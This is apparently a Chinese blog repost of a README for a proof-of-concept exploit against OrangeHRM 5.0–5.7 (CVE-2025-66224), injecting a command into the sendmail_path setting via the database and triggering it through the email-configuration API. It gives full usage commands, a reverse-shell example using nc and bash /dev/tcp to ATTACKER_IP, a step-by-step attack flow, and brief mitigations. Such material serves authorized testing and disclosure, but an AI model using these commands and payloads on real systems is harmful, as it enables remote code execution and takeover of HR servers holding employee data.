OrangeHRM RCE 最新漏洞利用 - CVE-2025-66224

zhengfei6112025-12-24 22:09

📋 描述

该概念验证(PoC)通过配置参数中的命令注入,展示了OrangeHRM中的远程代码执行(RCE)漏洞。sendmail_path

该漏洞的工作原理是:

  1. 向MySQL数据库(表)注入恶意负载hs_hr_config

  2. 通过电子邮件配置API端点触发负载执行

  3. 自动恢复原始值以清理走线

🎯 受影响版本

  • OrangeHRM 版本 5.0 至 5.7

⚠️免责声明

该工具仅供教育和授权安全测试目的。未经授权访问计算机系统是非法的。作者不对该工具造成的任何滥用或损害负责。

🔧 要求

复制代码
复制代码

pip install requests mysql-connector-python

📦 安装

复制代码
复制代码

git clone https://github.com/richard-natan/PoC-CVE-2025-66224 cd PoC-CVE-2025-66224 pip install -r requirements.txt

🚀 用途

步骤1:获取会话Cookie

  1. 通过网页界面登录OrangeHRM

  2. 打开浏览器开发者工具(F12)

  3. 访问存储>Cookies(Firefox)或应用>Cookies(Chrome)

  4. 复制cookie值_orangehrm

步骤2:运行漏洞

复制代码
复制代码

python3 exploit.py -t <TARGET_URL> -c <COOKIE_VALUE> \ -dh <MYSQL_HOST> -du <MYSQL_USER> -dp <MYSQL_PASSWORD> \ -cmd '<COMMAND_TO_EXECUTE>'

示例 - 简单命令

复制代码
复制代码

python3 exploit.py -t http://127.0.0.1:8080/ \ -c "g58tak8pbnheseatv6dggvi31i" \ -dh 172.18.0.2 \ -du orange_user \ -dp orange_password \ -cmd "touch /tmp/pwned"

示例 - 反向壳

复制代码
复制代码

Start listener on attacker machine nc -lvnp 4444 # Execute exploit with reverse shell payload python3 exploit.py -t http://target.com/ \ -c "your_session_cookie" \ -dh 172.18.0.2 \ -du orange_user \ -dp orange_password \ -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

📝 参数

参数 短篇 必填 描述
--target -t 目标URL(例如,http://target.com)
--cookie -c 会话 Cookie 值
--cookie_name -cn Cookie 名称(默认:_orangehrm)
--command -cmd 执行目标命令
--db_host -dh MySQL 主机地址
--db_user -du MySQL 用户名
--db_pass -dp MySQL 密码
--db_port -dport MySQL移植版(默认:3306)

🔍 工作原理

漏洞详情

漏洞存在于邮件配置功能中,参数存储在数据库中,之后在未经过适当净化的情况下执行。sendmail_path

开发流程:

复制代码
复制代码
  1. Authenticate to OrangeHRM (obtain valid session cookie) ↓ 2. Connect to MySQL database ↓ 3. Locate hs_hr_config table ↓ 4. Update email_config.sendmail_path value: FROM: /usr/sbin/sendmail -bs TO: /usr/sbin/sendmail -bs && <PAYLOAD> # ↓ 5. Trigger execution via API: PUT /web/index.php/api/v2/admin/email-configuration ↓ 6. Command executes on server ↓ 7. Restore original value (cleanup)

技术细节

脆弱参数: email_config.sendmail_path

数据库:

  • 表格:hs_hr_config

  • 列:= 'email_config.sendmail_path'name

  • 列:= sendmail 命令路径value

触发终点:

PUT /web/index.php/api/v2/admin/email-configuration

🛡️ 缓解措施

  1. 输入验证:对参数实施严格验证sendmail_path

  2. 逃脱:执行前正确转义 shell 命令

  3. 最低特权:以最小权限运行网页服务器

  4. 更新:为 OrangeHRM 应用最新的安全补丁

🔗 参考文献

⚠️请负责任地使用。检测前务必获得适当授权。

相关推荐
KmSH8umpK3 分钟前
Redis分布式锁从原生手写到Redisson高阶落地,附线上死锁复盘优化方案进阶第五篇
数据库·redis·分布式
lilihuigz6 分钟前
企业培训网站搭建指南:5步在WordPress上创建品牌学院
数据库
WL_Aurora15 分钟前
MySQL 5 卸载到 MySQL 8 安装完整指南(不踩坑版)
数据库·mysql
灰阳阳17 分钟前
MySQL的基本架构
数据库·mysql·架构
@小柯555m36 分钟前
MySql(高级操作符--Where in 和Not in)
数据库·sql·mysql
许彰午38 分钟前
CacheSQL(一):手写数据库的工程化重生
java·数据库·缓存
MmeD UCIZ38 分钟前
MySQL单表存多大的数据量比较合适
数据库·mysql
SarL EMEN1 小时前
mysql之联合索引
数据库·mysql
l1t1 小时前
DeepSeek总结的DuckDB anofox-forecast季节调整时间序列预测插件功能
开发语言·数据库
meta INGU1 小时前
mysql数据被误删的恢复方案
数据库·mysql
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04裂开!ChatGPT 居然开始要手机号验证,附详细解决方法05Codex 接入 DeepSeek API 完整配置文档062026年AI前瞻:量子AI、具身智能与科学发现的新纪元07零基础教你claude code 接入 deepseek V408在Windows 11上安装Docker的踩坑记录09实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲102026年4月AI大事件深度解读:大模型竞争进入“深水区“